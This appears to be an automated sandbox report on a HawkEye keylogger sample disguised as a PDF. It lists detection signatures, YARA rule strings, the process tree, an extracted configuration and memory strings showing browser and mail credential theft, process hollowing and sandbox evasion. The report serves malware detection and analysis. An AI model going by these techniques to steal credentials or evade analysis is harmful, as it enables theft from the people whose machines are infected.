Loading ...

Play interactive tourEdit tour

Analysis Report 5O857649056366403032021.PDF.exe

Overview

General Information

Sample Name:5O857649056366403032021.PDF.exe
Analysis ID:362120
MD5:a67f05d542bcee462ecc03ae4d8195d6
SHA1:eeb590aaa3c47851ae6f678c29aec2ba1b54df8f
SHA256:1e96629ba4b537932150cc517455a0cfddcb7c35a4a0998d107643dc887b31c3
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 5O857649056366403032021.PDF.exe (PID: 3468 cmdline: 'C:\Users\user\Desktop\5O857649056366403032021.PDF.exe' MD5: A67F05D542BCEE462ECC03AE4D8195D6)
    • 5O857649056366403032021.PDF.exe (PID: 5444 cmdline: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe MD5: A67F05D542BCEE462ECC03AE4D8195D6)
      • vbc.exe (PID: 6732 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 516 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • vbc.exe (PID: 6724 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000002.00000002.784876138.0000000008720000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
    • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
    00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
    • 0x7b719:$key: HawkEyeKeylogger
    • 0x7d917:$salt: 099u787978786
    • 0x7bd32:$string1: HawkEye_Keylogger
    • 0x7cb85:$string1: HawkEye_Keylogger
    • 0x7d877:$string1: HawkEye_Keylogger
    • 0x7c11b:$string2: holdermail.txt
    • 0x7c13b:$string2: holdermail.txt
    • 0x7c05d:$string3: wallet.dat
    • 0x7c075:$string3: wallet.dat
    • 0x7c08b:$string3: wallet.dat
    • 0x7d459:$string4: Keylog Records
    • 0x7d771:$string4: Keylog Records
    • 0x7d96f:$string5: do not script -->
    • 0x7b701:$string6: \pidloc.txt
    • 0x7b767:$string7: BSPLIT
    • 0x7b777:$string7: BSPLIT
    00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
        Click to see the 23 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.vbc.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          2.2.5O857649056366403032021.PDF.exe.8890000.12.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          2.2.5O857649056366403032021.PDF.exe.8720000.11.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          2.2.5O857649056366403032021.PDF.exe.41a9930.7.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            2.2.5O857649056366403032021.PDF.exe.41a9930.7.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 58 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Double ExtensionShow sources
              Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, CommandLine: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, NewProcessName: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, OriginalFileName: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, ParentCommandLine: 'C:\Users\user\Desktop\5O857649056366403032021.PDF.exe' , ParentImage: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, ParentProcessId: 3468, ProcessCommandLine: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe, ProcessId: 5444

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 5O857649056366403032021.PDF.exe.5444.2.memstrMalware Configuration Extractor: HawkEye {"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}
              Multi AV Scanner detection for submitted fileShow sources
              Source: 5O857649056366403032021.PDF.exeReversingLabs: Detection: 23%
              Machine Learning detection for sampleShow sources
              Source: 5O857649056366403032021.PDF.exeJoe Sandbox ML: detected
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpackAvira: Label: TR/Inject.vcoldi

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: 5O857649056366403032021.PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: 5O857649056366403032021.PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpBinary or memory string: autorun.inf
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpBinary or memory string: [autorun]
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00406EC3
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]2_2_073DFE8A
              Source: unknownDNS traffic detected: query: 203.215.12.0.in-addr.arpa replaycode: Name error (3)
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: unknownDNS traffic detected: queries for: 203.215.12.0.in-addr.arpa
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://en.w
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.243737730.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.0
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.224185573.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.223882735.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224185573.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC1
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC3
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comadeh
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224323142.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comark
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comb
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.227770906.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comf
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comghtv
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comht
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comies
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comitk
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.commpa
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsof
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.243602370.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.243672472.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.229567284.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.229591196.0000000006278000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/O
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.231534012.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.231609808.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.232516116.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersW
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.232557212.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersr
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.233214847.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comceTF
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222841537.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.223199362.0000000006265000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn&
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.223388192.0000000006265000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/X
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222841537.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.223199362.0000000006265000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-c
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.235768370.0000000006278000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.235768370.0000000006278000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/9
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.236539415.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmR
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krF
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krny
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.238156321.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.234952955.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.-
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.240555318.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.t
              Source: vbc.exe, vbc.exe, 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.227490771.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.227490771.0000000006268000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com8
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222273989.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222652479.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn-u
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
              Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 5444, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPE
              Contains functionality to log keystrokes (.Net Source)Show sources
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,7_2_0040D674

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
